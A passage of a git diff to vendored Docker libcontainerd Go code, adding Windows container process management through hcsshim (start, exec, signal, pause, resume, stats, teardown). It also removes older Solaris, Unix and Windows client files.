+ var ( + emulateConsole bool + createStdErrPipe bool + ) + if ctr.ociSpec.Process != nil { + emulateConsole = ctr.ociSpec.Process.Terminal + createStdErrPipe = !ctr.ociSpec.Process.Terminal + } + + createProcessParms := &hcsshim.ProcessConfig{ + EmulateConsole: emulateConsole, + WorkingDirectory: ctr.ociSpec.Process.Cwd, + CreateStdInPipe: true, + CreateStdOutPipe: true, + CreateStdErrPipe: createStdErrPipe, + } + + if ctr.ociSpec.Process != nil && ctr.ociSpec.Process.ConsoleSize != nil { + createProcessParms.ConsoleSize[0] = uint(ctr.ociSpec.Process.ConsoleSize.Height) + createProcessParms.ConsoleSize[1] = uint(ctr.ociSpec.Process.ConsoleSize.Width) + } + + // Configure the environment for the process + createProcessParms.Environment = setupEnvironmentVariables(ctr.ociSpec.Process.Env) + if ctr.isWindows { + createProcessParms.CommandLine = strings.Join(ctr.ociSpec.Process.Args, " ") + } else { + createProcessParms.CommandArgs = ctr.ociSpec.Process.Args + } + createProcessParms.User = ctr.ociSpec.Process.User.Username + + // LCOW requires the raw OCI spec passed through HCS and onwards to + // GCS for the utility VM. + if !ctr.isWindows { + ociBuf, err := json.Marshal(ctr.ociSpec) + if err != nil { + return -1, err + } + ociRaw := json.RawMessage(ociBuf) + createProcessParms.OCISpecification = &ociRaw + } + + ctr.Lock() + defer ctr.Unlock() + + // Start the command running in the container. 
+ newProcess, err := ctr.hcsContainer.CreateProcess(createProcessParms) + if err != nil { + logger.WithError(err).Error("CreateProcess() failed") + return -1, err + } + defer func() { + if err != nil { + if err := newProcess.Kill(); err != nil { + logger.WithError(err).Error("failed to kill process") + } + go func() { + if err := newProcess.Wait(); err != nil { + logger.WithError(err).Error("failed to wait for process") + } + if err := newProcess.Close(); err != nil { + logger.WithError(err).Error("failed to clean process resources") + } + }() + } + }() + p := &process{ + hcsProcess: newProcess, + id: InitProcessName, + pid: newProcess.Pid(), + } + logger.WithField("pid", p.pid).Debug("init process started") + + dio, err := newIOFromProcess(newProcess, ctr.ociSpec.Process.Terminal) + if err != nil { + logger.WithError(err).Error("failed to get stdio pipes") + return -1, err + } + _, err = attachStdio(dio) + if err != nil { + logger.WithError(err).Error("failed to attache stdio") + return -1, err + } + ctr.status = StatusRunning + ctr.init = p + + // Spin up a go routine waiting for exit to handle cleanup + go c.reapProcess(ctr, p) + + // Generate the associated event + c.eventQ.append(id, func() { + ei := EventInfo{ + ContainerID: id, + ProcessID: InitProcessName, + Pid: uint32(p.pid), + } + c.logger.WithFields(logrus.Fields{ + "container": ctr.id, + "event": EventStart, + "event-info": ei, + }).Info("sending event") + err := c.backend.ProcessEvent(ei.ContainerID, EventStart, ei) + if err != nil { + c.logger.WithError(err).WithFields(logrus.Fields{ + "container": id, + "event": EventStart, + "event-info": ei, + }).Error("failed to process event") + } + }) + logger.Debug("start() completed") + return p.pid, nil +} + +func newIOFromProcess(newProcess hcsshim.Process, terminal bool) (*cio.DirectIO, error) { + stdin, stdout, stderr, err := newProcess.Stdio() + if err != nil { + return nil, err + } + + dio := cio.NewDirectIO(createStdInCloser(stdin, newProcess), nil, 
nil, terminal) + + // Convert io.ReadClosers to io.Readers + if stdout != nil { + dio.Stdout = ioutil.NopCloser(&autoClosingReader{ReadCloser: stdout}) + } + if stderr != nil { + dio.Stderr = ioutil.NopCloser(&autoClosingReader{ReadCloser: stderr}) + } + return dio, nil +} + +// Exec adds a process in an running container +func (c *client) Exec(ctx context.Context, containerID, processID string, spec *specs.Process, withStdin bool, attachStdio StdioCallback) (int, error) { + ctr := c.getContainer(containerID) + switch { + case ctr == nil: + return -1, errors.WithStack(newNotFoundError("no such container")) + case ctr.hcsContainer == nil: + return -1, errors.WithStack(newInvalidParameterError("container is not running")) + case ctr.execs != nil && ctr.execs[processID] != nil: + return -1, errors.WithStack(newConflictError("id already in use")) + } + logger := c.logger.WithFields(logrus.Fields{ + "container": containerID, + "exec": processID, + }) + + // Note we always tell HCS to + // create stdout as it's required regardless of '-i' or '-t' options, so that + // docker can always grab the output through logs. We also tell HCS to always + // create stdin, even if it's not used - it will be closed shortly. Stderr + // is only created if it we're not -t. + createProcessParms := hcsshim.ProcessConfig{ + CreateStdInPipe: true, + CreateStdOutPipe: true, + CreateStdErrPipe: !spec.Terminal, + } + if spec.Terminal { + createProcessParms.EmulateConsole = true + if spec.ConsoleSize != nil { + createProcessParms.ConsoleSize[0] = uint(spec.ConsoleSize.Height) + createProcessParms.ConsoleSize[1] = uint(spec.ConsoleSize.Width) + } + } + + // Take working directory from the process to add if it is defined, + // otherwise take from the first process. 
+ if spec.Cwd != "" { + createProcessParms.WorkingDirectory = spec.Cwd + } else { + createProcessParms.WorkingDirectory = ctr.ociSpec.Process.Cwd + } + + // Configure the environment for the process + createProcessParms.Environment = setupEnvironmentVariables(spec.Env) + if ctr.isWindows { + createProcessParms.CommandLine = strings.Join(spec.Args, " ") + } else { + createProcessParms.CommandArgs = spec.Args + } + createProcessParms.User = spec.User.Username + + logger.Debugf("exec commandLine: %s", createProcessParms.CommandLine) + + // Start the command running in the container. + newProcess, err := ctr.hcsContainer.CreateProcess(&createProcessParms) + if err != nil { + logger.WithError(err).Errorf("exec's CreateProcess() failed") + return -1, err + } + pid := newProcess.Pid() + defer func() { + if err != nil { + if err := newProcess.Kill(); err != nil { + logger.WithError(err).Error("failed to kill process") + } + go func() { + if err := newProcess.Wait(); err != nil { + logger.WithError(err).Error("failed to wait for process") + } + if err := newProcess.Close(); err != nil { + logger.WithError(err).Error("failed to clean process resources") + } + }() + } + }() + + dio, err := newIOFromProcess(newProcess, spec.Terminal) + if err != nil { + logger.WithError(err).Error("failed to get stdio pipes") + return -1, err + } + // Tell the engine to attach streams back to the client + _, err = attachStdio(dio) + if err != nil { + return -1, err + } + + p := &process{ + id: processID, + pid: pid, + hcsProcess: newProcess, + } + + // Add the process to the container's list of processes + ctr.Lock() + ctr.execs[processID] = p + ctr.Unlock() + + // Spin up a go routine waiting for exit to handle cleanup + go c.reapProcess(ctr, p) + + c.eventQ.append(ctr.id, func() { + ei := EventInfo{ + ContainerID: ctr.id, + ProcessID: p.id, + Pid: uint32(p.pid), + } + c.logger.WithFields(logrus.Fields{ + "container": ctr.id, + "event": EventExecAdded, + "event-info": ei, + }).Info("sending 
event") + err := c.backend.ProcessEvent(ctr.id, EventExecAdded, ei) + if err != nil { + c.logger.WithError(err).WithFields(logrus.Fields{ + "container": ctr.id, + "event": EventExecAdded, + "event-info": ei, + }).Error("failed to process event") + } + err = c.backend.ProcessEvent(ctr.id, EventExecStarted, ei) + if err != nil { + c.logger.WithError(err).WithFields(logrus.Fields{ + "container": ctr.id, + "event": EventExecStarted, + "event-info": ei, + }).Error("failed to process event") + } + }) + + return pid, nil +} + +// Signal handles `docker stop` on Windows. While Linux has support for +// the full range of signals, signals aren't really implemented on Windows. +// We fake supporting regular stop and -9 to force kill. +func (c *client) SignalProcess(_ context.Context, containerID, processID string, signal int) error { + ctr, p, err := c.getProcess(containerID, processID) + if err != nil { + return err + } + + ctr.manualStopRequested = true + + logger := c.logger.WithFields(logrus.Fields{ + "container": containerID, + "process": processID, + "pid": p.pid, + "signal": signal, + }) + logger.Debug("Signal()") + + if processID == InitProcessName { + if syscall.Signal(signal) == syscall.SIGKILL { + // Terminate the compute system + if err := ctr.hcsContainer.Terminate(); err != nil { + if !hcsshim.IsPending(err) { + logger.WithError(err).Error("failed to terminate hccshim container") + } + } + } else { + // Shut down the container + if err := ctr.hcsContainer.Shutdown(); err != nil { + if !hcsshim.IsPending(err) && !hcsshim.IsAlreadyStopped(err) { + // ignore errors + logger.WithError(err).Error("failed to shutdown hccshim container") + } + } + } + } else { + return p.hcsProcess.Kill() + } + + return nil +} + +// Resize handles a CLI event to resize an interactive docker run or docker +// exec window. 
+func (c *client) ResizeTerminal(_ context.Context, containerID, processID string, width, height int) error { + _, p, err := c.getProcess(containerID, processID) + if err != nil { + return err + } + + c.logger.WithFields(logrus.Fields{ + "container": containerID, + "process": processID, + "height": height, + "width": width, + "pid": p.pid, + }).Debug("resizing") + return p.hcsProcess.ResizeConsole(uint16(width), uint16(height)) +} + +func (c *client) CloseStdin(_ context.Context, containerID, processID string) error { + _, p, err := c.getProcess(containerID, processID) + if err != nil { + return err + } + + return p.hcsProcess.CloseStdin() +} + +// Pause handles pause requests for containers +func (c *client) Pause(_ context.Context, containerID string) error { + ctr, _, err := c.getProcess(containerID, InitProcessName) + if err != nil { + return err + } + + if ctr.ociSpec.Windows.HyperV == nil { + return errors.New("cannot pause Windows Server Containers") + } + + ctr.Lock() + defer ctr.Unlock() + + if err = ctr.hcsContainer.Pause(); err != nil { + return err + } + + ctr.status = StatusPaused + + c.eventQ.append(containerID, func() { + err := c.backend.ProcessEvent(containerID, EventPaused, EventInfo{ + ContainerID: containerID, + ProcessID: InitProcessName, + }) + c.logger.WithFields(logrus.Fields{ + "container": ctr.id, + "event": EventPaused, + }).Info("sending event") + if err != nil { + c.logger.WithError(err).WithFields(logrus.Fields{ + "container": containerID, + "event": EventPaused, + }).Error("failed to process event") + } + }) + + return nil +} + +// Resume handles resume requests for containers +func (c *client) Resume(_ context.Context, containerID string) error { + ctr, _, err := c.getProcess(containerID, InitProcessName) + if err != nil { + return err + } + + if ctr.ociSpec.Windows.HyperV == nil { + return errors.New("cannot resume Windows Server Containers") + } + + ctr.Lock() + defer ctr.Unlock() + + if err = ctr.hcsContainer.Resume(); err != nil 
{ + return err + } + + ctr.status = StatusRunning + + c.eventQ.append(containerID, func() { + err := c.backend.ProcessEvent(containerID, EventResumed, EventInfo{ + ContainerID: containerID, + ProcessID: InitProcessName, + }) + c.logger.WithFields(logrus.Fields{ + "container": ctr.id, + "event": EventResumed, + }).Info("sending event") + if err != nil { + c.logger.WithError(err).WithFields(logrus.Fields{ + "container": containerID, + "event": EventResumed, + }).Error("failed to process event") + } + }) + + return nil +} + +// Stats handles stats requests for containers +func (c *client) Stats(_ context.Context, containerID string) (*Stats, error) { + ctr, _, err := c.getProcess(containerID, InitProcessName) + if err != nil { + return nil, err + } + + readAt := time.Now() + s, err := ctr.hcsContainer.Statistics() + if err != nil { + return nil, err + } + return &Stats{ + Read: readAt, + HCSStats: &s, + }, nil +} + +// Restore is the handler for restoring a container +func (c *client) Restore(ctx context.Context, id string, attachStdio StdioCallback) (bool, int, error) { + c.logger.WithField("container", id).Debug("restore()") + + // TODO Windows: On RS1, a re-attach isn't possible. + // However, there is a scenario in which there is an issue. + // Consider a background container. The daemon dies unexpectedly. + // HCS will still have the compute service alive and running. + // For consistence, we call in to shoot it regardless if HCS knows about it + // We explicitly just log a warning if the terminate fails. + // Then we tell the backend the container exited. 
+	if hc, err := hcsshim.OpenContainer(id); err == nil {
+		const terminateTimeout = time.Minute * 2
+		err := hc.Terminate()
+
+		if hcsshim.IsPending(err) {
+			err = hc.WaitTimeout(terminateTimeout)
+		} else if hcsshim.IsAlreadyStopped(err) {
+			err = nil
+		}
+
+		if err != nil {
+			c.logger.WithField("container", id).WithError(err).Debug("terminate failed on restore")
+			return false, -1, err
+		}
+	}
+	return false, -1, nil
+}
+
+// ListPids returns a list of process IDs running in a container.
+// Not used on Windows.
+func (c *client) ListPids(_ context.Context, _ string) ([]uint32, error) {
+	return nil, errors.New("not implemented on Windows")
+}
+
+// Summary returns a summary of the processes running in a container.
+// This is present in Windows to support docker top. In linux, the
+// engine shells out to ps to get process information. On Windows, as
+// the containers could be Hyper-V containers, they would not be
+// visible on the container host. However, libcontainerd does have
+// that information.
+func (c *client) Summary(_ context.Context, containerID string) ([]Summary, error) { + ctr, _, err := c.getProcess(containerID, InitProcessName) + if err != nil { + return nil, err + } + + p, err := ctr.hcsContainer.ProcessList() + if err != nil { + return nil, err + } + + pl := make([]Summary, len(p)) + for i := range p { + pl[i] = Summary(p[i]) + } + return pl, nil +} + +func (c *client) DeleteTask(ctx context.Context, containerID string) (uint32, time.Time, error) { + ec := -1 + ctr := c.getContainer(containerID) + if ctr == nil { + return uint32(ec), time.Now(), errors.WithStack(newNotFoundError("no such container")) + } + + select { + case <-ctx.Done(): + return uint32(ec), time.Now(), errors.WithStack(ctx.Err()) + case <-ctr.waitCh: + default: + return uint32(ec), time.Now(), errors.New("container is not stopped") + } + + ctr.Lock() + defer ctr.Unlock() + return ctr.exitCode, ctr.exitedAt, nil +} + +func (c *client) Delete(_ context.Context, containerID string) error { + c.Lock() + defer c.Unlock() + ctr := c.containers[containerID] + if ctr == nil { + return errors.WithStack(newNotFoundError("no such container")) + } + + ctr.Lock() + defer ctr.Unlock() + + switch ctr.status { + case StatusCreated: + if err := c.shutdownContainer(ctr); err != nil { + return err + } + fallthrough + case StatusStopped: + delete(c.containers, containerID) + return nil + } + + return errors.WithStack(newInvalidParameterError("container is not stopped")) +} + +func (c *client) Status(ctx context.Context, containerID string) (Status, error) { + c.Lock() + defer c.Unlock() + ctr := c.containers[containerID] + if ctr == nil { + return StatusUnknown, errors.WithStack(newNotFoundError("no such container")) + } + + ctr.Lock() + defer ctr.Unlock() + return ctr.status, nil +} + +func (c *client) UpdateResources(ctx context.Context, containerID string, resources *Resources) error { + // Updating resource isn't supported on Windows + // but we should return nil for enabling updating 
container + return nil +} + +func (c *client) CreateCheckpoint(ctx context.Context, containerID, checkpointDir string, exit bool) error { + return errors.New("Windows: Containers do not support checkpoints") +} + +func (c *client) getContainer(id string) *container { + c.Lock() + ctr := c.containers[id] + c.Unlock() + + return ctr +} + +func (c *client) getProcess(containerID, processID string) (*container, *process, error) { + ctr := c.getContainer(containerID) + switch { + case ctr == nil: + return nil, nil, errors.WithStack(newNotFoundError("no such container")) + case ctr.init == nil: + return nil, nil, errors.WithStack(newNotFoundError("container is not running")) + case processID == InitProcessName: + return ctr, ctr.init, nil + default: + ctr.Lock() + defer ctr.Unlock() + if ctr.execs == nil { + return nil, nil, errors.WithStack(newNotFoundError("no execs")) + } + } + + p := ctr.execs[processID] + if p == nil { + return nil, nil, errors.WithStack(newNotFoundError("no such exec")) + } + + return ctr, p, nil +} + +func (c *client) shutdownContainer(ctr *container) error { + const shutdownTimeout = time.Minute * 5 + err := ctr.hcsContainer.Shutdown() + + if hcsshim.IsPending(err) { + err = ctr.hcsContainer.WaitTimeout(shutdownTimeout) + } else if hcsshim.IsAlreadyStopped(err) { + err = nil + } + + if err != nil { + c.logger.WithError(err).WithField("container", ctr.id). + Debug("failed to shutdown container, terminating it") + terminateErr := c.terminateContainer(ctr) + if terminateErr != nil { + c.logger.WithError(terminateErr).WithField("container", ctr.id). 
+ Error("failed to shutdown container, and subsequent terminate also failed") + return fmt.Errorf("%s: subsequent terminate failed %s", err, terminateErr) + } + return err + } + + return nil +} + +func (c *client) terminateContainer(ctr *container) error { + const terminateTimeout = time.Minute * 5 + err := ctr.hcsContainer.Terminate() + + if hcsshim.IsPending(err) { + err = ctr.hcsContainer.WaitTimeout(terminateTimeout) + } else if hcsshim.IsAlreadyStopped(err) { + err = nil + } + + if err != nil { + c.logger.WithError(err).WithField("container", ctr.id). + Debug("failed to terminate container") + return err + } + + return nil +} + +func (c *client) reapProcess(ctr *container, p *process) int { + logger := c.logger.WithFields(logrus.Fields{ + "container": ctr.id, + "process": p.id, + }) + + var eventErr error + + // Block indefinitely for the process to exit. + if err := p.hcsProcess.Wait(); err != nil { + if herr, ok := err.(*hcsshim.ProcessError); ok && herr.Err != windows.ERROR_BROKEN_PIPE { + logger.WithError(err).Warnf("Wait() failed (container may have been killed)") + } + // Fall through here, do not return. This ensures we attempt to + // continue the shutdown in HCS and tell the docker engine that the + // process/container has exited to avoid a container being dropped on + // the floor. + } + exitedAt := time.Now() + + exitCode, err := p.hcsProcess.ExitCode() + if err != nil { + if herr, ok := err.(*hcsshim.ProcessError); ok && herr.Err != windows.ERROR_BROKEN_PIPE { + logger.WithError(err).Warnf("unable to get exit code for process") + } + // Since we got an error retrieving the exit code, make sure that the + // code we return doesn't incorrectly indicate success. + exitCode = -1 + + // Fall through here, do not return. This ensures we attempt to + // continue the shutdown in HCS and tell the docker engine that the + // process/container has exited to avoid a container being dropped on + // the floor. 
+ } + + if err := p.hcsProcess.Close(); err != nil { + logger.WithError(err).Warnf("failed to cleanup hcs process resources") + exitCode = -1 + eventErr = fmt.Errorf("hcsProcess.Close() failed %s", err) + } + + if p.id == InitProcessName { + // Update container status + ctr.Lock() + ctr.status = StatusStopped + ctr.exitedAt = exitedAt + ctr.exitCode = uint32(exitCode) + close(ctr.waitCh) + ctr.Unlock() + + if err := c.shutdownContainer(ctr); err != nil { + exitCode = -1 + logger.WithError(err).Warn("failed to shutdown container") + thisErr := fmt.Errorf("failed to shutdown container: %s", err) + if eventErr != nil { + eventErr = fmt.Errorf("%s: %s", eventErr, thisErr) + } else { + eventErr = thisErr + } + } else { + logger.Debug("completed container shutdown") + } + + if err := ctr.hcsContainer.Close(); err != nil { + exitCode = -1 + logger.WithError(err).Error("failed to clean hcs container resources") + thisErr := fmt.Errorf("failed to terminate container: %s", err) + if eventErr != nil { + eventErr = fmt.Errorf("%s: %s", eventErr, thisErr) + } else { + eventErr = thisErr + } + } + } + + c.eventQ.append(ctr.id, func() { + ei := EventInfo{ + ContainerID: ctr.id, + ProcessID: p.id, + Pid: uint32(p.pid), + ExitCode: uint32(exitCode), + ExitedAt: exitedAt, + Error: eventErr, + } + c.logger.WithFields(logrus.Fields{ + "container": ctr.id, + "event": EventExit, + "event-info": ei, + }).Info("sending event") + err := c.backend.ProcessEvent(ctr.id, EventExit, ei) + if err != nil { + c.logger.WithError(err).WithFields(logrus.Fields{ + "container": ctr.id, + "event": EventExit, + "event-info": ei, + }).Error("failed to process event") + } + if p.id != InitProcessName { + ctr.Lock() + delete(ctr.execs, p.id) + ctr.Unlock() + } + }) + + return exitCode +} diff --git a/vendor/github.com/docker/docker/libcontainerd/client_solaris.go b/vendor/github.com/docker/docker/libcontainerd/client_solaris.go deleted file mode 100644 index cb939975f8..0000000000 --- 
a/vendor/github.com/docker/docker/libcontainerd/client_solaris.go +++ /dev/null @@ -1,101 +0,0 @@ -package libcontainerd - -import "golang.org/x/net/context" - -type client struct { - clientCommon - - // Platform specific properties below here. - remote *remote - q queue - exitNotifiers map[string]*exitNotifier - liveRestore bool -} - -// GetServerVersion returns the connected server version information -func (clnt *client) GetServerVersion(ctx context.Context) (*ServerVersion, error) { - resp, err := clnt.remote.apiClient.GetServerVersion(ctx, &containerd.GetServerVersionRequest{}) - if err != nil { - return nil, err - } - - sv := &ServerVersion{ - GetServerVersionResponse: *resp, - } - - return sv, nil -} - -func (clnt *client) AddProcess(ctx context.Context, containerID, processFriendlyName string, specp Process, attachStdio StdioCallback) (int, error) { - return -1, nil -} - -func (clnt *client) SignalProcess(containerID string, pid string, sig int) error { - return nil -} - -func (clnt *client) Resize(containerID, processFriendlyName string, width, height int) error { - return nil -} - -func (clnt *client) Pause(containerID string) error { - return nil -} - -func (clnt *client) Resume(containerID string) error { - return nil -} - -func (clnt *client) Stats(containerID string) (*Stats, error) { - return nil, nil -} - -func (clnt *client) getExitNotifier(containerID string) *exitNotifier { - clnt.mapMutex.RLock() - defer clnt.mapMutex.RUnlock() - return clnt.exitNotifiers[containerID] -} - -func (clnt *client) getOrCreateExitNotifier(containerID string) *exitNotifier { - clnt.mapMutex.Lock() - defer clnt.mapMutex.Unlock() - w, ok := clnt.exitNotifiers[containerID] - if !ok { - w = &exitNotifier{c: make(chan struct{}), client: clnt} - clnt.exitNotifiers[containerID] = w - } - return w -} - -// Restore is the handler for restoring a container -func (clnt *client) Restore(containerID string, attachStdio StdioCallback, options ...CreateOption) error { - return nil 
-} - -func (clnt *client) GetPidsForContainer(containerID string) ([]int, error) { - return nil, nil -} - -// Summary returns a summary of the processes running in a container. -func (clnt *client) Summary(containerID string) ([]Summary, error) { - return nil, nil -} - -// UpdateResources updates resources for a running container. -func (clnt *client) UpdateResources(containerID string, resources Resources) error { - // Updating resource isn't supported on Solaris - // but we should return nil for enabling updating container - return nil -} - -func (clnt *client) CreateCheckpoint(containerID string, checkpointID string, checkpointDir string, exit bool) error { - return nil -} - -func (clnt *client) DeleteCheckpoint(containerID string, checkpointID string, checkpointDir string) error { - return nil -} - -func (clnt *client) ListCheckpoints(containerID string, checkpointDir string) (*Checkpoints, error) { - return nil, nil -} diff --git a/vendor/github.com/docker/docker/libcontainerd/client_unix.go b/vendor/github.com/docker/docker/libcontainerd/client_unix.go deleted file mode 100644 index 21e8fea666..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/client_unix.go +++ /dev/null @@ -1,142 +0,0 @@ -// +build linux solaris - -package libcontainerd - -import ( - "encoding/json" - "fmt" - "os" - "path/filepath" - "strings" - "sync" - - "github.com/Sirupsen/logrus" - containerd "github.com/docker/containerd/api/grpc/types" - "github.com/docker/docker/pkg/idtools" - specs "github.com/opencontainers/runtime-spec/specs-go" - "golang.org/x/net/context" -) - -func (clnt *client) prepareBundleDir(uid, gid int) (string, error) { - root, err := filepath.Abs(clnt.remote.stateDir) - if err != nil { - return "", err - } - if uid == 0 && gid == 0 { - return root, nil - } - p := string(filepath.Separator) - for _, d := range strings.Split(root, string(filepath.Separator))[1:] { - p = filepath.Join(p, d) - fi, err := os.Stat(p) - if err != nil && !os.IsNotExist(err) { - 
return "", err - } - if os.IsNotExist(err) || fi.Mode()&1 == 0 { - p = fmt.Sprintf("%s.%d.%d", p, uid, gid) - if err := idtools.MkdirAs(p, 0700, uid, gid); err != nil && !os.IsExist(err) { - return "", err - } - } - } - return p, nil -} - -func (clnt *client) Create(containerID string, checkpoint string, checkpointDir string, spec specs.Spec, attachStdio StdioCallback, options ...CreateOption) (err error) { - clnt.lock(containerID) - defer clnt.unlock(containerID) - - if _, err := clnt.getContainer(containerID); err == nil { - return fmt.Errorf("Container %s is already active", containerID) - } - - uid, gid, err := getRootIDs(specs.Spec(spec)) - if err != nil { - return err - } - dir, err := clnt.prepareBundleDir(uid, gid) - if err != nil { - return err - } - - container := clnt.newContainer(filepath.Join(dir, containerID), options...) - if err := container.clean(); err != nil { - return err - } - - defer func() { - if err != nil { - container.clean() - clnt.deleteContainer(containerID) - } - }() - - if err := idtools.MkdirAllAs(container.dir, 0700, uid, gid); err != nil && !os.IsExist(err) { - return err - } - - f, err := os.Create(filepath.Join(container.dir, configFilename)) - if err != nil { - return err - } - defer f.Close() - if err := json.NewEncoder(f).Encode(spec); err != nil { - return err - } - - return container.start(checkpoint, checkpointDir, attachStdio) -} - -func (clnt *client) Signal(containerID string, sig int) error { - clnt.lock(containerID) - defer clnt.unlock(containerID) - _, err := clnt.remote.apiClient.Signal(context.Background(), &containerd.SignalRequest{ - Id: containerID, - Pid: InitFriendlyName, - Signal: uint32(sig), - }) - return err -} - -func (clnt *client) newContainer(dir string, options ...CreateOption) *container { - container := &container{ - containerCommon: containerCommon{ - process: process{ - dir: dir, - processCommon: processCommon{ - containerID: filepath.Base(dir), - client: clnt, - friendlyName: InitFriendlyName, - 
}, - }, - processes: make(map[string]*process), - }, - } - for _, option := range options { - if err := option.Apply(container); err != nil { - logrus.Errorf("libcontainerd: newContainer(): %v", err) - } - } - return container -} - -type exitNotifier struct { - id string - client *client - c chan struct{} - once sync.Once -} - -func (en *exitNotifier) close() { - en.once.Do(func() { - close(en.c) - en.client.mapMutex.Lock() - if en == en.client.exitNotifiers[en.id] { - delete(en.client.exitNotifiers, en.id) - } - en.client.mapMutex.Unlock() - }) -} -func (en *exitNotifier) wait() <-chan struct{} { - return en.c -} diff --git a/vendor/github.com/docker/docker/libcontainerd/client_windows.go b/vendor/github.com/docker/docker/libcontainerd/client_windows.go deleted file mode 100644 index ddcf321c85..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/client_windows.go +++ /dev/null @@ -1,631 +0,0 @@ -package libcontainerd - -import ( - "errors" - "fmt" - "io" - "io/ioutil" - "os" - "path/filepath" - "strings" - "syscall" - - "golang.org/x/net/context" - - "github.com/Microsoft/hcsshim" - "github.com/Sirupsen/logrus" - "github.com/docker/docker/pkg/sysinfo" - "github.com/opencontainers/runtime-spec/specs-go" -) - -type client struct { - clientCommon - - // Platform specific properties below here (none presently on Windows) -} - -// Win32 error codes that are used for various workarounds -// These really should be ALL_CAPS to match golangs syscall library and standard -// Win32 error conventions, but golint insists on CamelCase. 
-const ( - CoEClassstring = syscall.Errno(0x800401F3) // Invalid class string - ErrorNoNetwork = syscall.Errno(1222) // The network is not present or not started - ErrorBadPathname = syscall.Errno(161) // The specified path is invalid - ErrorInvalidObject = syscall.Errno(0x800710D8) // The object identifier does not represent a valid object -) - -// defaultOwner is a tag passed to HCS to allow it to differentiate between -// container creator management stacks. We hard code "docker" in the case -// of docker. -const defaultOwner = "docker" - -// Create is the entrypoint to create a container from a spec, and if successfully -// created, start it too. Table below shows the fields required for HCS JSON calling parameters, -// where if not populated, is omitted. -// +-----------------+--------------------------------------------+---------------------------------------------------+ -// | | Isolation=Process | Isolation=Hyper-V | -// +-----------------+--------------------------------------------+---------------------------------------------------+ -// | VolumePath | \\?\\Volume{GUIDa} | | -// | LayerFolderPath | %root%\windowsfilter\containerID | %root%\windowsfilter\containerID (servicing only) | -// | Layers[] | ID=GUIDb;Path=%root%\windowsfilter\layerID | ID=GUIDb;Path=%root%\windowsfilter\layerID | -// | SandboxPath | | %root%\windowsfilter | -// | HvRuntime | | ImagePath=%root%\BaseLayerID\UtilityVM | -// +-----------------+--------------------------------------------+---------------------------------------------------+ -// -// Isolation=Process example: -// -// { -// "SystemType": "Container", -// "Name": "5e0055c814a6005b8e57ac59f9a522066e0af12b48b3c26a9416e23907698776", -// "Owner": "docker", -// "IsDummy": false, -// "VolumePath": "\\\\\\\\?\\\\Volume{66d1ef4c-7a00-11e6-8948-00155ddbef9d}", -// "IgnoreFlushesDuringBoot": true, -// "LayerFolderPath": "C:\\\\control\\\\windowsfilter\\\\5e0055c814a6005b8e57ac59f9a522066e0af12b48b3c26a9416e23907698776", -// 
"Layers": [{ -// "ID": "18955d65-d45a-557b-bf1c-49d6dfefc526", -// "Path": "C:\\\\control\\\\windowsfilter\\\\65bf96e5760a09edf1790cb229e2dfb2dbd0fcdc0bf7451bae099106bfbfea0c" -// }], -// "HostName": "5e0055c814a6", -// "MappedDirectories": [], -// "HvPartition": false, -// "EndpointList": ["eef2649d-bb17-4d53-9937-295a8efe6f2c"], -// "Servicing": false -//} -// -// Isolation=Hyper-V example: -// -//{ -// "SystemType": "Container", -// "Name": "475c2c58933b72687a88a441e7e0ca4bd72d76413c5f9d5031fee83b98f6045d", -// "Owner": "docker", -// "IsDummy": false, -// "IgnoreFlushesDuringBoot": true, -// "Layers": [{ -// "ID": "18955d65-d45a-557b-bf1c-49d6dfefc526", -// "Path": "C:\\\\control\\\\windowsfilter\\\\65bf96e5760a09edf1790cb229e2dfb2dbd0fcdc0bf7451bae099106bfbfea0c" -// }], -// "HostName": "475c2c58933b", -// "MappedDirectories": [], -// "SandboxPath": "C:\\\\control\\\\windowsfilter", -// "HvPartition": true, -// "EndpointList": ["e1bb1e61-d56f-405e-b75d-fd520cefa0cb"], -// "HvRuntime": { -// "ImagePath": "C:\\\\control\\\\windowsfilter\\\\65bf96e5760a09edf1790cb229e2dfb2dbd0fcdc0bf7451bae099106bfbfea0c\\\\UtilityVM" -// }, -// "Servicing": false -//} -func (clnt *client) Create(containerID string, checkpoint string, checkpointDir string, spec specs.Spec, attachStdio StdioCallback, options ...CreateOption) error { - clnt.lock(containerID) - defer clnt.unlock(containerID) - logrus.Debugln("libcontainerd: client.Create() with spec", spec) - - configuration := &hcsshim.ContainerConfig{ - SystemType: "Container", - Name: containerID, - Owner: defaultOwner, - IgnoreFlushesDuringBoot: false, - HostName: spec.Hostname, - HvPartition: false, - } - - if spec.Windows.Resources != nil { - if spec.Windows.Resources.CPU != nil { - if spec.Windows.Resources.CPU.Count != nil { - // This check is being done here rather than in adaptContainerSettings - // because we don't want to update the HostConfig in case this container - // is moved to a host with more CPUs than this one. 
- cpuCount := *spec.Windows.Resources.CPU.Count - hostCPUCount := uint64(sysinfo.NumCPU()) - if cpuCount > hostCPUCount { - logrus.Warnf("Changing requested CPUCount of %d to current number of processors, %d", cpuCount, hostCPUCount) - cpuCount = hostCPUCount - } - configuration.ProcessorCount = uint32(cpuCount) - } - if spec.Windows.Resources.CPU.Shares != nil { - configuration.ProcessorWeight = uint64(*spec.Windows.Resources.CPU.Shares) - } - if spec.Windows.Resources.CPU.Percent != nil { - configuration.ProcessorMaximum = int64(*spec.Windows.Resources.CPU.Percent) * 100 // ProcessorMaximum is a value between 1 and 10000 - } - } - if spec.Windows.Resources.Memory != nil { - if spec.Windows.Resources.Memory.Limit != nil { - configuration.MemoryMaximumInMB = int64(*spec.Windows.Resources.Memory.Limit) / 1024 / 1024 - } - } - if spec.Windows.Resources.Storage != nil { - if spec.Windows.Resources.Storage.Bps != nil { - configuration.StorageBandwidthMaximum = *spec.Windows.Resources.Storage.Bps - } - if spec.Windows.Resources.Storage.Iops != nil { - configuration.StorageIOPSMaximum = *spec.Windows.Resources.Storage.Iops - } - } - } - - var layerOpt *LayerOption - for _, option := range options { - if s, ok := option.(*ServicingOption); ok { - configuration.Servicing = s.IsServicing - continue - } - if f, ok := option.(*FlushOption); ok { - configuration.IgnoreFlushesDuringBoot = f.IgnoreFlushesDuringBoot - continue - } - if h, ok := option.(*HyperVIsolationOption); ok { - configuration.HvPartition = h.IsHyperV - configuration.SandboxPath = h.SandboxPath - continue - } - if l, ok := option.(*LayerOption); ok { - layerOpt = l - } - if n, ok := option.(*NetworkEndpointsOption); ok { - configuration.EndpointList = n.Endpoints - configuration.AllowUnqualifiedDNSQuery = n.AllowUnqualifiedDNSQuery - continue - } - if c, ok := option.(*CredentialsOption); ok 